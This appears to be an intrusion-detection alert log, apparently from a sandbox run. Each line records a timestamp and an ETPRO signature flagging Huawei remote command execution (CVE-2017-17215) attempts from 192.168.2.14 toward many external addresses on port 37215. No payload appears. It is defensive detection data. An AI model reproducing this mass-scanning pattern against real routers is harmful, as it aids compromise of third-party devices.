                                                        06/13/24-21:33:00.887902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5480837215192.168.2.14156.11.132.171
                                                        06/13/24-21:32:36.268957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5582437215192.168.2.14197.144.199.189
                                                        06/13/24-21:32:11.487102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4987037215192.168.2.1441.151.102.69
                                                        06/13/24-21:33:13.212628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5101837215192.168.2.1441.55.74.105
                                                        06/13/24-21:32:42.408002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3358637215192.168.2.1441.233.217.197
                                                        06/13/24-21:33:11.157406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5735637215192.168.2.14197.74.49.85
                                                        06/13/24-21:32:09.458068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5385437215192.168.2.1441.206.112.91
                                                        06/13/24-21:33:07.042388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5819637215192.168.2.14197.81.93.112
                                                        06/13/24-21:32:52.669217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6013437215192.168.2.14156.63.171.199
                                                        06/13/24-21:32:36.265932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5844637215192.168.2.14197.77.6.253
                                                        06/13/24-21:32:13.545486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3302637215192.168.2.1441.17.189.71
                                                        06/13/24-21:32:13.544391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5554637215192.168.2.1441.89.87.79
                                                        06/13/24-21:32:11.486750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5341237215192.168.2.1441.127.90.185
                                                        06/13/24-21:32:15.629173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3845037215192.168.2.14197.238.34.104
                                                        06/13/24-21:33:02.908902TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5936237215192.168.2.14197.108.206.136
                                                        06/13/24-21:32:42.420551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4579037215192.168.2.1441.172.164.6
                                                        06/13/24-21:33:05.014210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5085437215192.168.2.14156.187.132.35
                                                        06/13/24-21:32:48.570266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4092037215192.168.2.1441.230.211.89
                                                        06/13/24-21:33:11.160571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3793437215192.168.2.14197.231.169.191
                                                        06/13/24-21:32:44.475461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5578237215192.168.2.1441.144.252.114
                                                        06/13/24-21:32:52.655698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4707437215192.168.2.1441.38.114.17
                                                        06/13/24-21:32:42.424132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5280637215192.168.2.14156.16.122.233
                                                        06/13/24-21:32:42.424593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5865037215192.168.2.14156.36.181.46
                                                        06/13/24-21:33:05.016461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4371237215192.168.2.14197.46.91.51
                                                        06/13/24-21:33:00.870796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4893637215192.168.2.1441.219.20.226
                                                        06/13/24-21:32:38.302631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5549037215192.168.2.14156.191.170.63
                                                        06/13/24-21:32:50.613701TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5638837215192.168.2.14197.251.190.201
                                                        06/13/24-21:32:34.195647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4299237215192.168.2.14197.221.202.237
                                                        06/13/24-21:32:44.452272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5602837215192.168.2.1441.163.210.69
                                                        06/13/24-21:32:40.359212TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5893437215192.168.2.1441.163.56.116
                                                        06/13/24-21:32:07.401904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3711237215192.168.2.1441.237.16.225
                                                        06/13/24-21:32:23.937764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4328637215192.168.2.1441.133.252.82
                                                        06/13/24-21:33:05.013228TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4769637215192.168.2.14197.30.127.116
                                                        06/13/24-21:32:01.223518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4173037215192.168.2.1441.8.81.143
                                                        06/13/24-21:33:13.213075TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5244437215192.168.2.14197.201.231.153
                                                        06/13/24-21:31:59.197884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4389437215192.168.2.14197.161.140.105
                                                        06/13/24-21:32:34.217830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4447637215192.168.2.14197.102.87.116
                                                        06/13/24-21:32:23.945349TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3312637215192.168.2.1441.86.136.121
                                                        06/13/24-21:31:59.177695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5364637215192.168.2.14197.116.183.242
                                                        06/13/24-21:32:13.565281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3384637215192.168.2.1441.185.148.47
                                                        06/13/24-21:32:52.679837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5698637215192.168.2.14156.159.156.148
                                                        06/13/24-21:32:48.553379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5974837215192.168.2.14156.130.85.172
                                                        06/13/24-21:32:28.026719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4285237215192.168.2.14197.129.137.239
                                                        06/13/24-21:32:46.525565TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4768637215192.168.2.14156.204.113.144
                                                        06/13/24-21:32:44.454181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4982037215192.168.2.14197.180.167.115
                                                        06/13/24-21:33:11.154509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5573437215192.168.2.1441.39.14.114
                                                        06/13/24-21:32:34.217689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4701637215192.168.2.14197.136.109.194
                                                        06/13/24-21:31:57.093787TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4175637215192.168.2.1441.215.251.115
                                                        06/13/24-21:33:11.154928TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4261437215192.168.2.14156.171.133.39
                                                        06/13/24-21:33:11.160187TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3762637215192.168.2.14197.200.200.87
                                                        06/13/24-21:32:23.833504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5456437215192.168.2.1441.242.63.79
                                                        06/13/24-21:32:54.707992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5794437215192.168.2.14156.65.128.190
                                                        06/13/24-21:33:05.014912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3755837215192.168.2.14156.206.232.222
                                                        06/13/24-21:33:13.228210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4133437215192.168.2.1441.157.148.128
                                                        06/13/24-21:32:48.570225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3984837215192.168.2.1441.168.25.163
                                                        06/13/24-21:31:57.132921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3699237215192.168.2.14197.130.71.247
                                                        06/13/24-21:32:50.611605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4882237215192.168.2.1441.118.15.173
                                                        06/13/24-21:33:00.888727TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5588837215192.168.2.14197.228.35.220
                                                        06/13/24-21:32:34.196923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5989237215192.168.2.14197.189.223.14
                                                        06/13/24-21:32:09.438804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5912237215192.168.2.14156.137.73.8
                                                        06/13/24-21:32:34.192999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4543037215192.168.2.14156.98.47.206
                                                        06/13/24-21:32:32.167932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3737237215192.168.2.14197.20.84.241
                                                        06/13/24-21:32:21.801516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5334837215192.168.2.14197.87.141.21
                                                        06/13/24-21:32:15.606880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5078437215192.168.2.14197.136.94.36
                                                        06/13/24-21:32:56.759156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4224437215192.168.2.1441.42.133.110
                                                        06/13/24-21:32:11.488274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3534637215192.168.2.14156.248.225.156
                                                        06/13/24-21:33:15.257463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4214237215192.168.2.14156.97.128.61
                                                        06/13/24-21:32:58.823415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4245437215192.168.2.14197.254.11.100
                                                        06/13/24-21:31:57.153558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4097837215192.168.2.14197.197.236.157
                                                        06/13/24-21:32:25.969577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3393637215192.168.2.1441.117.103.90
                                                        06/13/24-21:32:25.972211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5933237215192.168.2.1441.114.138.50
                                                        06/13/24-21:33:00.872742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4555637215192.168.2.14197.40.90.248
                                                        06/13/24-21:32:23.940403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4710237215192.168.2.14197.30.133.183
                                                        06/13/24-21:32:36.266241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3936037215192.168.2.14156.224.53.232
                                                        06/13/24-21:32:01.221374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5925437215192.168.2.1441.13.137.193
                                                        06/13/24-21:33:04.991598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4932637215192.168.2.1441.64.2.117
                                                        06/13/24-21:32:28.023852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4341837215192.168.2.14197.199.19.231
                                                        06/13/24-21:32:28.025677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3388837215192.168.2.1441.208.56.234
                                                        06/13/24-21:32:46.502751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5819237215192.168.2.1441.5.124.75
                                                        06/13/24-21:32:28.028125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5305037215192.168.2.14156.123.97.30
                                                        06/13/24-21:32:30.073881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4062437215192.168.2.1441.51.162.142
                                                        06/13/24-21:32:40.374411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6093037215192.168.2.14197.142.86.54
                                                        06/13/24-21:32:52.680468TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5373637215192.168.2.14156.41.224.202
                                                        06/13/24-21:33:13.211962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4253037215192.168.2.1441.91.83.179
                                                        06/13/24-21:33:13.214577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6052037215192.168.2.14156.219.3.31
                                                        06/13/24-21:32:19.729304TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5779637215192.168.2.1441.104.204.149
                                                        06/13/24-21:31:59.197633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5022437215192.168.2.14197.187.191.53
                                                        06/13/24-21:32:32.153884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4119637215192.168.2.1441.21.189.253
                                                        06/13/24-21:32:32.169384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3412037215192.168.2.14197.38.69.189
                                                        06/13/24-21:32:36.263396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5200237215192.168.2.14156.138.47.210
                                                        06/13/24-21:32:52.657575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4786437215192.168.2.1441.173.224.117
                                                        06/13/24-21:32:56.785128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4140637215192.168.2.14156.118.172.157
                                                        06/13/24-21:32:17.670142TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5904837215192.168.2.14197.64.99.18
                                                        06/13/24-21:32:48.552256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3979037215192.168.2.14156.166.113.70
                                                        06/13/24-21:33:11.155295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4671037215192.168.2.14156.27.178.50
                                                        06/13/24-21:32:21.782429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4970437215192.168.2.14197.191.171.138
                                                        06/13/24-21:32:42.417726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4668237215192.168.2.14197.62.242.116
                                                        06/13/24-21:33:09.084873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3904637215192.168.2.1441.33.66.45
                                                        06/13/24-21:32:48.556321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5875637215192.168.2.14197.77.101.54
                                                        06/13/24-21:33:04.988819TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5433037215192.168.2.14197.141.220.149
                                                        06/13/24-21:32:38.320154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5460237215192.168.2.14197.142.224.72
                                                        06/13/24-21:32:01.238906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3518637215192.168.2.14197.23.17.96
                                                        06/13/24-21:32:50.614938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5621037215192.168.2.14197.109.107.22
                                                        06/13/24-21:32:34.213920TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3503237215192.168.2.14156.117.227.235
                                                        06/13/24-21:31:57.093228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5079237215192.168.2.14156.194.215.17
                                                        06/13/24-21:33:11.181075TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3297437215192.168.2.1441.154.97.245
                                                        06/13/24-21:32:30.076033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5212637215192.168.2.1441.203.87.178
                                                        06/13/24-21:32:38.321399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6036637215192.168.2.14197.157.145.120
                                                        06/13/24-21:32:40.373392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4710837215192.168.2.14156.176.103.142
                                                        06/13/24-21:32:54.708504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5505837215192.168.2.14197.235.60.108
                                                        06/13/24-21:32:01.248205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5795837215192.168.2.1441.254.4.120
                                                        06/13/24-21:33:04.990049TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4618837215192.168.2.14156.167.188.224
                                                        06/13/24-21:32:13.564532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5375037215192.168.2.14156.109.40.107
                                                        06/13/24-21:32:42.422916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5619037215192.168.2.14156.69.187.57
                                                        06/13/24-21:33:09.087368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3818437215192.168.2.14197.94.81.214
                                                        06/13/24-21:32:40.358553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3856637215192.168.2.14156.96.96.86
                                                        06/13/24-21:32:30.127443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3502837215192.168.2.14156.161.90.145
                                                        06/13/24-21:32:46.526099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4599037215192.168.2.14197.111.63.224
                                                        06/13/24-21:32:52.657897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4125437215192.168.2.1441.8.195.48
                                                        06/13/24-21:33:00.868962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5032837215192.168.2.1441.201.213.202
                                                        06/13/24-21:32:28.024653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5583637215192.168.2.14156.176.24.173
                                                        06/13/24-21:32:28.046876TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5475437215192.168.2.14197.209.99.27
                                                        06/13/24-21:33:09.108990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3317237215192.168.2.14156.204.174.121
                                                        06/13/24-21:32:56.758666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4717437215192.168.2.1441.110.218.247
                                                        06/13/24-21:33:11.159923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3798237215192.168.2.1441.134.106.223
                                                        06/13/24-21:32:03.308395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5083037215192.168.2.14156.114.73.197
                                                        06/13/24-21:32:17.695271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5912837215192.168.2.1441.72.204.156
                                                        06/13/24-21:32:01.242087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5091637215192.168.2.1441.19.63.155
                                                        06/13/24-21:33:00.888071TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3492037215192.168.2.14156.33.52.183
                                                        06/13/24-21:33:15.253844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5875437215192.168.2.14156.245.176.136
                                                        06/13/24-21:33:15.257316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4911637215192.168.2.14156.244.221.147
                                                        06/13/24-21:32:30.076411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3958837215192.168.2.1441.250.71.218
                                                        06/13/24-21:32:50.617545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4506237215192.168.2.1441.215.66.234
                                                        06/13/24-21:33:15.274009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5034037215192.168.2.1441.130.98.16
                                                        06/13/24-21:32:03.308266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4054237215192.168.2.14197.94.22.210
                                                        06/13/24-21:32:03.277236TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3594237215192.168.2.14156.75.42.168
                                                        06/13/24-21:31:57.092274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4733637215192.168.2.14197.207.180.13
                                                        06/13/24-21:32:09.452819TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3570037215192.168.2.14156.16.131.214
                                                        06/13/24-21:32:28.027041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3287637215192.168.2.14197.132.169.223
                                                        06/13/24-21:32:11.506753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3420437215192.168.2.14156.214.73.211
                                                        06/13/24-21:32:17.675331TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5540637215192.168.2.14197.167.148.224
                                                        06/13/24-21:31:59.197572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5697037215192.168.2.14156.96.157.43
                                                        06/13/24-21:32:05.371255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4873437215192.168.2.14197.20.5.166
                                                        06/13/24-21:32:25.996237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3560837215192.168.2.14197.214.131.142
                                                        06/13/24-21:32:36.265403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3648837215192.168.2.1441.248.72.248
                                                        06/13/24-21:32:52.676431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4046237215192.168.2.14156.12.200.206
                                                        06/13/24-21:33:11.160861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6037437215192.168.2.1441.98.83.160
                                                        06/13/24-21:32:01.224805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3519837215192.168.2.14197.196.30.151
                                                        06/13/24-21:32:38.320618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4793637215192.168.2.1441.34.106.123
                                                        06/13/24-21:32:46.504214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5722437215192.168.2.14197.35.166.113
                                                        06/13/24-21:32:30.099253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3726237215192.168.2.14156.95.2.171
                                                        06/13/24-21:32:56.758459TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5098237215192.168.2.14197.62.153.180
                                                        06/13/24-21:32:54.707910TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4230637215192.168.2.1441.127.136.101
                                                        06/13/24-21:33:11.175516TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3779837215192.168.2.1441.246.71.82
                                                        06/13/24-21:32:17.672785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3892037215192.168.2.1441.190.110.24
                                                        06/13/24-21:31:59.174412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5206037215192.168.2.1441.22.200.117
                                                        06/13/24-21:32:46.524810TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4042237215192.168.2.1441.155.118.231
                                                        06/13/24-21:32:05.378269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6050237215192.168.2.14156.46.5.55
                                                        06/13/24-21:32:38.304365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4659437215192.168.2.1441.56.104.144
                                                        06/13/24-21:32:01.246855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3876637215192.168.2.14197.236.233.22
                                                        06/13/24-21:33:00.889368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3659837215192.168.2.14156.179.86.25
                                                        06/13/24-21:32:40.379641TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3571837215192.168.2.14197.201.218.165
                                                        06/13/24-21:32:52.680592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4615037215192.168.2.1441.26.56.230
                                                        06/13/24-21:32:01.219925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4337837215192.168.2.14156.115.77.90
                                                        06/13/24-21:32:28.043948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3652437215192.168.2.1441.68.138.109
                                                        06/13/24-21:32:38.299168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5870037215192.168.2.14156.84.101.173
                                                        06/13/24-21:31:57.091644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4258037215192.168.2.14197.198.156.243
                                                        06/13/24-21:32:48.552801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5461837215192.168.2.14156.57.161.229
                                                        06/13/24-21:32:01.223730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3955037215192.168.2.14156.32.117.115
                                                        06/13/24-21:32:50.613901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3921637215192.168.2.1441.53.7.192
                                                        06/13/24-21:32:17.695790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4723237215192.168.2.14156.69.172.152
                                                        06/13/24-21:33:13.231598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5194237215192.168.2.14197.93.143.149
                                                        06/13/24-21:33:09.101674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5460637215192.168.2.14197.118.85.118
                                                        06/13/24-21:32:32.147906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3958637215192.168.2.14156.231.111.8
                                                        06/13/24-21:32:34.217314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3836837215192.168.2.14197.214.226.158
                                                        06/13/24-21:32:17.696858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4978837215192.168.2.14197.188.215.92
                                                        06/13/24-21:32:19.731728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5022837215192.168.2.1441.57.103.164
                                                        06/13/24-21:32:30.126249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3523837215192.168.2.14197.17.219.12
                                                        06/13/24-21:32:28.026232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5420437215192.168.2.14156.121.0.152
                                                        06/13/24-21:32:52.656806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3585837215192.168.2.14156.143.255.104
                                                        06/13/24-21:32:44.479965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5321837215192.168.2.14197.32.148.200
                                                        06/13/24-21:32:13.567878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5454237215192.168.2.14197.128.40.154
                                                        06/13/24-21:32:52.671627TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4941437215192.168.2.14156.52.58.240
                                                        06/13/24-21:32:38.316860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4893637215192.168.2.1441.211.92.34
                                                        06/13/24-21:32:09.440748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4288837215192.168.2.1441.242.193.249
                                                        06/13/24-21:32:17.697010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4806037215192.168.2.14156.176.153.161
